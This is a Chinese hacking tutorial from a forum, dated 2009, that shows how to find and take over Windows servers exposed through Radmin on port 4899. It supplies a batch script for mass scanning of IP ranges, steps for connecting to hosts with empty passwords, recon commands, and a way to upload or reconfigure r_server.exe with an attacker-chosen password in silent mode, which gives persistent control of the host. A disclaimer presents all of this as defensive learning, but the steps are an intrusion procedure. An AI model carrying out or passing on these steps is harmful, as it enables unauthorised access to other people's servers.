声明
  
以下内容仅用于学习严禁非法破坏.请大家不用利用此方法对国内的网络做任何破坏.
国人应该团结起来一致对外才是我们的责任.由此文章造成的破坏本人不承担任何责任

环境2000服务器或就虚拟2000或2003吧，前提是装了radmin客户端.4899探测会过滤的.
xp要突破s端限制才可以方法我也不讲了.工具：radmin3.0连接器 searchIP 4899探测器 radmin服务端{r_server.exe}

1扫描工具相信大家都有了吧  这里给大家介绍通用扫描批处理：

@echo off
setlocal
cls
color e
title SYN(正在扫描，请稍后... ...)
for /f "eol= tokens=1,2 delims= " %%i in (ip.txt) do s syn %%i %%j 端口号 /save
for /f "eol=- tokens=1 delims= " %%i in (result.txt) do echo %%i>>s1.txt
for /f "eol=P tokens=1 delims= " %%i in (s1.txt) do echo %%i>>s2.txt
for /f "eol=S tokens=1 delims= " %%i in (s2.txt) do echo %%i>>ips.txt
del s1.txt
del s2.txt
exit

上面那个端口号改成自己要扫的端口就好了 复制生成TXT后改后缀.bat就好了

2然后找个s扫描器一般扫描工具里都有的

3建立ip.txt文本文档 在文档里填入你要扫的ip段，格式起始ip空格结束ip

4定位ip我用searchIP这个工具，这个很简单在百度或者GOOGEL上搜索某个结果时搜索结束后把那个IE里的地址放进去 那个0-255可以勾上也可以不勾.也可以自己去定位！

5开扫！

6结束生成了2个文档result.txt和ips.txt前面那个是全部扫描结果 后面的是筛选的结果去掉了没用的信息之后的

7然后导入 你扫的那个端口的探测器。探测器到处有下的很好找好的..

8探测后用radmin连接吧端口要和你扫到的一致

9远程telnet看下什么系统键入才c：\boot.ini
查看开服务：netstat/an | find “3389”这里的3389是终端默认端口 没有显示就说明没有开或者改了端口也可以输入 query user或者netstat/an直接查看网络开放的端口netstat/n查看当前使用连接端口！

10查找radmin服务端位置键入：dir r_server.exe！没有找到就去C盘根目录去找.
cd\
c：\〉dir /s r_server.exe再找不到咱们自己传r_server.exe和admdll.dll传过去后把本机的r_server.exe和admdll.dll放到自己的根目录下然后自己这cmd命令下键入c：\〉r_server/h这是全部能接的命令

11弥补空密码：c：\〉r_server/pass 自己设定密码/save /silence
其中的save是保存，silence是安静模式下

12  Ok了

加入后门我就不说了
简单的菜鸟教材.教大家预防自己个人电脑或者服务器出现低级漏洞被人入侵！

                                                                       jienting
                                                                        09.12.10

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课